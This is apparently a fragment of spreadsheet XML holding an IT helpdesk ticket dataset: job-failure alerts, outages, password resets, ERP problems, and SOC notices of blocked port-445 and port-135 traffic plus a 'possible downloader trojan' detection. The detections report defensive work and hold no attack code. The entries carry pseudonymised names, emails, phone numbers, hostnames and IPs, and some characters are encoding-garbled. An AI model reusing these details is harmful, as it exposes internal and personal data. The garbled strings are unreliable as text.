  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_61_erp_wly_dp failed in job_scheduler at: 08/28/2016 20:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_61_erp_wly_dp failed in job_scheduler at: 08/28/2016 20:08:00</t>
  </si>
  <si>
    <t>ç”µè„‘ä¸èƒ½å¼€æœº</t>
  </si>
  <si>
    <t>æ—©ä¸Šä¸Šç­ç”µè„‘æ‰“ä¸å¼€ã€‚</t>
  </si>
  <si>
    <t>mzerdtop xnlytczj</t>
  </si>
  <si>
    <t>engineering tool access requested</t>
  </si>
  <si>
    <t xml:space="preserve">broken client anti virus </t>
  </si>
  <si>
    <t>cvqnstgu ofnimlwx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1306 failed in job_scheduler at: 08/28/2016 17:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1306 failed in job_scheduler at: 08/28/2016 17:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_551 failed in job_scheduler at: 08/28/2016 15:23:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_551 failed in job_scheduler at: 08/28/2016 15:23:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 08/28/2016 14:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 08/28/2016 14:10:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_5_regen failed in job_scheduler at: 08/28/2016 13:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_5_regen failed in job_scheduler at: 08/28/2016 13:32:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 08/28/2016 13:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 08/28/2016 13:25:00</t>
  </si>
  <si>
    <t>HostName_1304 :volume consumed on /dev/mksysbalv is more than 85%</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1304 :volume consumed on /dev/mksysbalv is more than 85%._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">unable to approve expense report 2111137500 </t>
  </si>
  <si>
    <t xml:space="preserve">from: proygkjt mwetuhqf 
sent: sunday, august 28, 2016 7:11 pm
to: nwfodmhc exurcwkm
cc: ifblxjmc dyrgfwbm; callie pollaurid
subject: re: expense report 2111137500 has been submitted.
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
-----original message-----
from: workflow system [mailto:wf-batch@company.com] 
sent: friday, august 26, 2016 6:14 pm
to: proygkjt mwetuhqf &lt;proygkjt.mwetuhqf@gmail.com&gt;
subject: expense report 2111137500 has been submitted.
the following expense report has been submitted for your approval:
personnel no.:    12156719280  (jeffrghryeyrghryey a strgrtyiet)
expense report no.:    2111137500
start date:    25.07.2016 08:00:00
end date:    24.08.2016 17:00:00
total costs:    usd 1.141,89
reimbursement amount:    usd 1.141,89
to review this expense report in full, please log into your universal worklist on manager self-service.
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_504 failed in job_scheduler at: 08/28/2016 09:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_504 failed in job_scheduler at: 08/28/2016 09:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_494 failed in job_scheduler at: 08/28/2016 09:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_494 failed in job_scheduler at: 08/28/2016 09:22:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/28/2016 08:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/28/2016 08:35:00</t>
  </si>
  <si>
    <t>power outage:usa- (company) - divestiture site is hard down since at 7:40 am et on 08/28/16.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____7:40 am et on 08/28/16_________________x000D_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</si>
  <si>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134 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25</t>
  </si>
  <si>
    <t>dsw_x000D_
_x000D_
in33727185incident overview_x000D_
=========================_x000D_
we have detected at least 134 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25/15.69.85.2812 and destined to port 445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t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_1_regen failed in job_scheduler at: 08/28/2016 05:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_1_regen failed in job_scheduler at: 08/28/2016 05:56:00</t>
  </si>
  <si>
    <t>in HostName_968, HostName_107,  HostName_520 service alwaysupservice.exe is not running.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 08/28/2016 04:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 08/28/2016 04:02:00</t>
  </si>
  <si>
    <t>please reset telephony_software password for: (username)-(ticket_no1545706)</t>
  </si>
  <si>
    <t>please reset telephony_software password
name:(full name) cajdwtgq breqgycv 
username: pogredrty
extension: 207563
site: israel</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/28/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/28/2016 00:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 08/27/2016 23:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 08/27/2016 23:02:00</t>
  </si>
  <si>
    <t>skype for business is shutting down when starting the computer</t>
  </si>
  <si>
    <t>the error message is "skype for business has stopped working" and there is an icon to click that says "close the programdnty"</t>
  </si>
  <si>
    <t>kpnzvsuw lwmqyjbv</t>
  </si>
  <si>
    <t>india:switch company-ap-ind-pu4-2960s-stack-sw01(17.01.85.8278) is down since 8:22 pm on 08/27 et</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_749 failed in job_scheduler at: 08/27/2016 15:29:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_749 failed in job_scheduler at: 08/27/2016 15:29:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39hotf failed in job_scheduler at: 08/27/2016 15:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39hotf failed in job_scheduler at: 08/27/2016 15:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_48hotf failed in job_scheduler at: 08/27/2016 15:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_48hotf failed in job_scheduler at: 08/27/2016 15:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_729 failed in job_scheduler at: 08/27/2016 15:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_729 failed in job_scheduler at: 08/27/2016 15:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_55apps failed in job_scheduler at: 08/27/2016 15:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_55apps failed in job_scheduler at: 08/27/2016 15:10:00</t>
  </si>
  <si>
    <t>problem report from pwr8hmc1.hq.company.com;pmr number: 73968,082,000</t>
  </si>
  <si>
    <t xml:space="preserve">reporting system: 2-hq-dev2-9119-mme-sn21a9bf7 machine type-model/serial: 9119-mme/21a9bf7 problem number: 90
error: a8115872
description: platform firmware (0x82) reported an error.
last occurred: 8/27/16 7:47 am
current status: opened
pmr number: 739
details: remote support call generated on pwr8hmc1 completed successfully by server pwr8hmc1(192.168.128.1).
</t>
  </si>
  <si>
    <t>company-na-usa-usa-eh-media-2960-access-sw07 switch is down at usa company location since 12:37pm et on 08/27/16</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1925 failed in job_scheduler at: 08/27/2016 12:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1925 failed in job_scheduler at: 08/27/2016 12:56:00</t>
  </si>
  <si>
    <t>cannot connect to internet although wifi connected</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ugephfta.hrbqkvij@gmail.com_x000D_
_x000D_
hello_x000D_
cannot connect to any internet site via explorer although my wifi is connected. pls help urgently i am supposed to run uacyltoe hxgayczeing and am already an hour behind._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1989 failed in job_scheduler at: 08/27/2016 11:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1989 failed in job_scheduler at: 08/27/2016 11:24:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2071 failed in job_scheduler at: 08/27/2016 11:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2071 failed in job_scheduler at: 08/27/2016 11:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1910 failed in job_scheduler at: 08/27/2016 11:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1910 failed in job_scheduler at: 08/27/2016 11:22:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1906 failed in job_scheduler at: 08/27/2016 11:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1906 failed in job_scheduler at: 08/27/2016 11:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1904 failed in job_scheduler at: 08/27/2016 11:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1904 failed in job_scheduler at: 08/27/2016 11:15:00</t>
  </si>
  <si>
    <t>HostName_53:volume: f:\ label:dat2-HostName_53 d4e35b72 on server is over 85% space consumed. space available: 1.4 g</t>
  </si>
  <si>
    <t>HostName_53:volume: f:\ label:dat2-HostName_53 d4e35b72 on server is over 85% space consumed. space available: 1.4 gb</t>
  </si>
  <si>
    <t xml:space="preserve">'repeat outbound connection for 135/tcp' </t>
  </si>
  <si>
    <t>dsw in33693734_x000D_
_x000D_
we are seeing your 80.71.06.702/company-european-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from awyl8911907/10.16.143.215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soc</t>
  </si>
  <si>
    <t>dsw in33604236_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from lhql8516748/10.24.12.180 to port 135/tcp (remote procedure call (rpc)) of external host 92.242.140.21.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soc</t>
  </si>
  <si>
    <t xml:space="preserve">29866 vid22518 bare http get executable from ip address </t>
  </si>
  <si>
    <t xml:space="preserve">dsw in33608874_x000D_
_x000D_
 received alert(s) for summary "29866 vid22518 bare http get executable from ip address (possible downloader trojan)" from the device with ip address "80.68.49.4169". the source of this traffic is from ip "16.56.04.95108" (axcl8812244), and the destination is ip "103.7.29.25". details of an example event are shown below. please investigate this activity and remediate as necessary._x000D_
_x000D_
as always, if you have any questions or concerns, please call the counter threat operations center at 877 opt 1 to discuss, or submit a response in the open ticket with an action of "respond to soc". _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">54.96.80.216/att-apac-asa.company.com-1 device generating at least 129 'internal outbreak for 7/tcp' </t>
  </si>
  <si>
    <t xml:space="preserve">dsw in33715799_x000D_
_x000D_
we are seeing your 54.96.80.216/att-apac-asa.company.com-1 device generating at least 129 'internal outbreak for 7/tcp' alerts within 10 minutes, for traffic (blocked) from aidl8912600/10.38.91.26 to port 7/tcp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internal reconnaissance alerts (explicit notification via a medium priority ticket (no phone call))_x000D_
2) automatically resolve internal reconnaissance alerts to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000D_
_x000D_
sincerely,_x000D_
 soc_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/27/2016 08:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/27/2016 08:20:00</t>
  </si>
  <si>
    <t>network outage: usa - (company inc) network is down since 8:06am et on 08/27/16.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________8:06am et on 08/27/16_____________x000D_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</si>
  <si>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emails not updating</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1898 failed in job_scheduler at: 08/27/2016 07:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1898 failed in job_scheduler at: 08/27/2016 07:20:00</t>
  </si>
  <si>
    <t>HostName_148(SID_24): volume consumed on /dev/erplv is more than 85%.</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/27/2016 07:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/27/2016 07:08:00</t>
  </si>
  <si>
    <t>ms outlook 2010, not accepting password.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3190 failed in job_scheduler at: 08/27/2016 01:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3190 failed in job_scheduler at: 08/27/2016 01:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gnasmtvx.cwxtsvkm@gmail.com
hi.
please unblock the erp password.
userid: hegdthy (gnasmtvx cwxtsvkm)
</t>
  </si>
  <si>
    <t>how to access drwgs from net weaver</t>
  </si>
  <si>
    <t>name:jvpkulxw ovuweygj
language:
browser:microsoft internet explorer
email:jvpkulxw.ovuweygj@gmail.com
customer number:
telephone:094
summary:how to access drwgs from net weaver</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail_uacyltoe hxgaycze failed in job_scheduler at: 08/26/2016 23:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail_uacyltoe hxgaycze failed in job_scheduler at: 08/26/2016 23:22:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/26/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/26/2016 22:02:00</t>
  </si>
  <si>
    <t>circuit outage :germany -company(werkzeuge &amp; hartstoffe) secondary vpn is down since 4:19 pm on 08/26 et</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________4:19 pm on 08/26 et______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___na____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? __na_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____na____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ____________na_____________       _x000D_
_x000D_
12. notified  gsc  _____na___     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">unable to sync with one note files </t>
  </si>
  <si>
    <t>problems weekly report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jokgacwd.hdfcwust@gmail.com_x000D_
_x000D_
hello all,_x000D_
_x000D_
i canÂ´t transfer my weekly report to the system._x000D_
_x000D_
donÂ´t know whatÂ´s the problem._x000D_
_x000D_
see the atache as well._x000D_
_x000D_
need your support._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jokgacwd hdfcwust</t>
  </si>
  <si>
    <t>collaboration_platform assistance</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wjpncyef.tspnaimc@gmail.com_x000D_
_x000D_
hello â€“ i need some assistance updating part of the collaboration_platform page for my department.  specifically, there is a link on our page that directs to a document.  i need to ensure that a more up to date version of the document is linked._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wjpncyef tspnaimc</t>
  </si>
  <si>
    <t>cannot use skype for business with full audio and video. it does not respond and must be closed down.</t>
  </si>
  <si>
    <t xml:space="preserve">any skype meeting used must be entered with "call me at:" and "don't join audio". the "use skype for business(full audio and video experience)" only freezes skype. it takes really a long time to open again._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019failagain_emb1 failed in job_scheduler at: 08/26/2016 15:26:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019failagain_emb1 failed in job_scheduler at: 08/26/2016 15:26:00</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail_emb1 failed in job_scheduler at: 08/26/2016 15:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail_emb1 failed in job_scheduler at: 08/26/2016 15:21:00</t>
  </si>
  <si>
    <t>connecting to vpn</t>
  </si>
  <si>
    <t>unable to scan from the hp all in one printer</t>
  </si>
  <si>
    <t>reset the password for ljpgedia bzqcwsgf on erp / production / erp</t>
  </si>
  <si>
    <t xml:space="preserve">updating password on password_management_tool </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: peojqgvm.qayeptuo@gmail.com_x000D_
_x000D_
not able to log into vpn.  need some assistance please._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bex not loading all environment</t>
  </si>
  <si>
    <t>bex addin is not showing all environment(SID_37, SID_39,etc) and unable to add  SID_37._x000D_
installed bex patch and bex addin but same issue, it happened to erp logon also but later manually added  different environment._x000D_
_x000D_
can you please check how it got dierppeared  without making any changes._x000D_
_x000D_
please refer to screenshot _x000D_
_x000D_
_x000D_
computer name-lhql7404424</t>
  </si>
  <si>
    <t>ie settings</t>
  </si>
  <si>
    <t xml:space="preserve">unable to install draftsight on the pc </t>
  </si>
  <si>
    <t>unable to connect to skype</t>
  </si>
  <si>
    <t>xklpahsd nyxtoazm</t>
  </si>
  <si>
    <t>remove ukxtqfda qvtaykbg from telephony_software workgroups and company directory</t>
  </si>
  <si>
    <t>employee took vsp therefore, remove ukxtqfda qvtaykbg from telephony_software workgroups and company directory</t>
  </si>
  <si>
    <t>weekly report error message</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mrczxwje.ocasryzq@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
bitte um behebung von folgendem problem._x000D_
bei aktiver vpn verbindung kann der weekly report nicht hochgeladen werden._x000D_
_x000D_
[cid:image001.jpg@01d1ffc1.92c4d840]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen |  best </t>
  </si>
  <si>
    <t>mrczxwje ocasryzq</t>
  </si>
  <si>
    <t>erp password reset urgent account got locked out</t>
  </si>
  <si>
    <t>erp password reset. account got locked out.</t>
  </si>
  <si>
    <t>pqbnkgtc yhcfqozs</t>
  </si>
  <si>
    <t>two analog lines not working with new phone system  they support our 911 and adt/tyco notification system!!</t>
  </si>
  <si>
    <t>need two analog lines turned back on immediately  423.928.6266  &amp; 423.928.6076  we have no emergency notification system right now.</t>
  </si>
  <si>
    <t>csyigtrb gkvbjuto</t>
  </si>
  <si>
    <t>agents are not receiving revenue</t>
  </si>
  <si>
    <t>the agents are not receiving the correct amount of revenue. please look at the procedure that is assigning revenue based on direct and pos rules</t>
  </si>
  <si>
    <t>usa orders showing up in the us_plant to-do list</t>
  </si>
  <si>
    <t>both locations have a work center 81821121 defined in erp, which is causing orders for both locations to appear in the to-do list.   change the query to check for both the plant and work center.</t>
  </si>
  <si>
    <t>erp issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: raifstow.gfeymtql@gmail.com_x000D_
_x000D_
i cannot create deliveries and also erp is really slow, its hard to even get through an order. this is a huge priority as our shipments suffer._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool error </t>
  </si>
  <si>
    <t xml:space="preserve">reset ess password </t>
  </si>
  <si>
    <t>apgukfow soqdkxtb</t>
  </si>
  <si>
    <t>not able to do pgi for deliveries 9168017962/8057916405/9168048239/916806308 - error co account assignments</t>
  </si>
  <si>
    <t xml:space="preserve">delivery 9168017962 customer 81295213  - itens 7172133-6060954-7171068 ( co account assignments have different profit centers_x000D_
 message # bk134) _x000D_
delivery 9168027516 customer 81295213- itens 2668785-3647247-4859489 ( co account assignments have different profit centers_x000D_
 message # bk134) _x000D_
delivery 9168048239-customer 81295213-itens 4768854-3752015 ( co account assignments have different profit centers_x000D_
 message # bk134) _x000D_
delivery 9169147360-customer 81295213-item 6101508- co account assignments have different profit centers_x000D_
 message # bk134) _x000D_
</t>
  </si>
  <si>
    <t>unable to check emails / doesn't sync // account settings are outdated.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to remove/add/repair email account from windows phone._x000D_
trying to repair the account and its showing that repair not possible._x000D_
its not even letting user to remove and re-add the account._x000D_
unable to check emails / doesn't sync // account settings are outdated._x000D_
</t>
  </si>
  <si>
    <t>zlxcsqdg ckpojwir</t>
  </si>
  <si>
    <t xml:space="preserve">query : attendance_tool account. </t>
  </si>
  <si>
    <t>ticket update on ticket_no0433866</t>
  </si>
  <si>
    <t>erp delivery issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: raifstow.gfeymtql@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am having issues forcing deliveries in erp._x000D_
_x000D_
[cid:image001.png@01d1ff73.c210fc30]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nicrhty wanted to set ooo from ofwxjriq rwcxkflq's mailbox.</t>
  </si>
  <si>
    <t>frhqlxst gedzxkry</t>
  </si>
  <si>
    <t>require crm access in android phone</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: luxdnsvk.qmnyzcfs@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i would like to use crm on my android mobile phone._x000D_
kindly let me know the procedure._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>ng_azubi locked</t>
  </si>
  <si>
    <t>nrlhywbm sxhtogly</t>
  </si>
  <si>
    <t>ng_azubi locked.</t>
  </si>
  <si>
    <t>final quota warning</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
can you please help me on trailing email on "mailbox-full" warning?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mjsvgrfo nvpblgyd</t>
  </si>
  <si>
    <t>mobile device support</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ebqdmgpk.daoyrtmj@gmail.com_x000D_
_x000D_
hello,_x000D_
i am having issues with incoming/outgoing call on my company mobile device. i was unable to access the global support center on the hub. i will likely need a new device, as this issue is impact related. do i contact vendor mobile directly, or ? </t>
  </si>
  <si>
    <t>ebqdmgpk daoyrtmj</t>
  </si>
  <si>
    <t>support fÃ¼r umbau \ ewew8323862 \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>oblsreqg vafkmznt</t>
  </si>
  <si>
    <t>close line item on order 19101476</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
please close line item 91 on order number 20212587 because it has already been delivered but remains open in md04._x000D_
</t>
  </si>
  <si>
    <t>cqrmewsi xypfqhid</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/26/2016 08:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/26/2016 08:15:00</t>
  </si>
  <si>
    <t>lqzrgsko yaixmtqs</t>
  </si>
  <si>
    <t xml:space="preserve"> it help for engineering_tool and engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">dear sir,_x000D_
_x000D_
please help to download software of engineering_tool &amp; engineering_tool on my laptop._x000D_
our details are as below. i have a dealer of company india ltd._x000D_
dist. name â€“ ramdntya enterprises , aurangabad ( maharashtra )_x000D_
dist. code â€“ 81808174._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>account getting locked frequently</t>
  </si>
  <si>
    <t>account getting locked frequently. user changed the password today itself.</t>
  </si>
  <si>
    <t xml:space="preserve">wrong commited dates for 1409 on orders and quotes </t>
  </si>
  <si>
    <t xml:space="preserve">team, since yesterday we noticed that the commited date on order confirmation is wrong - it should be 12 days if tool is available in germany for transit plus 10 days for customer pick up. as a matheywter of fact the dates are too long in the future - e.g. order 35955871 opened today and available in plant_105 gives committed date of all mms (confirmed only for november). </t>
  </si>
  <si>
    <t>it - erp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kehtxprg.uekapfzt@gmail.com_x000D_
_x000D_
i am trying to access point of sales data in bex and it tells me i am not authorized, can you please authorize and give me access to that cube?_x000D_
_x000D_
attached is the files i am opening and once i connect to bex it gives me the following message_x000D_
_x000D_
[cid:image001.jpg@01d1ff67.61cd1680]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>laptop charge, network cable not working in our docks</t>
  </si>
  <si>
    <t>wrong nxd in plm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vahqkojb.trlapeso@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
a drawing was saved under the wrong plm number._x000D_
please delete nxd #71894643_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>vahqkojb trlapeso</t>
  </si>
  <si>
    <t>requesting for dock station and add-on monitor</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,_x000D_
_x000D_
i am requesting for dock station and add-on monitor (preferably bigger in size). please consider this request and assist. _x000D_
 - beneficial to me while auditing inwarehouse_tools that will have average sized fonts, i could view the same in bigger screen very clearly_x000D_
 - helps me with my various work related activities like inwarehouse_tool comparison so i can do it in much more effective way with add-on monitor_x000D_
 - also helps me in email activities_x000D_
 - last but not the least, i don't have to carry my laptop charger to office everyday and can make my laptop big bit more lighter ;)_x000D_
</t>
  </si>
  <si>
    <t>support fÃ¼r umbau \ewew8323735 \lpfzasmv cleoprzq</t>
  </si>
  <si>
    <t>probleme mit rechner ewewx200257 \howfanzi siavgtby</t>
  </si>
  <si>
    <t xml:space="preserve">probleme mit infostand \ewew8323718 </t>
  </si>
  <si>
    <t>support fÃ¼r stÃ¶hrmann \xosdfhbu gtbfkisl</t>
  </si>
  <si>
    <t>authorisation to the folder in m drive - qa folder</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rjanhbde.owfkyjcp@gmail.com
hello ,
pl. assign read  / write authorisation to : guru j prasath, his user id : "prarttsagj"
folder : m:\qa\iso 2008\iso9001_2008\SID_73
warm </t>
  </si>
  <si>
    <t>problem with erp logon</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zaeduhlt.jdgsamtv@gmail.com_x000D_
_x000D_
[cid:image001.png@01d1ff8a.b54283e0]_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / with best </t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:53:00</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:50:00</t>
  </si>
  <si>
    <t>pls install ms outlook at pc of trainee yqwuhzkv icvgkxnt</t>
  </si>
  <si>
    <t>pls install ms outlook at pc of trainee yqwuhzkv icvgkxnt - pls.assign to qbnsrzlv gyqxkbae</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:43:00</t>
  </si>
  <si>
    <t>windows activation message</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
